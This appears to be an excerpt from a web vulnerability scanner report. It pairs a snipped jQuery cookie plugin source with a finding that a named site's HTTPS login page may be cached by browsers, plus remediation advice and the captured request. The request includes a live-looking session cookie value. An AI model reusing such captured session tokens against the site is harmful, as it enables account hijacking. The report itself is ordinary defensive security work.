/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
Cache-control: no-store
Pragma: no-cache
Request
GET /en/shopping-cart/login HTTP/1.1 Host: www.leaseweb.com Connection: keep-alive Referer: https://www.leaseweb.com/en/shopping-cart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1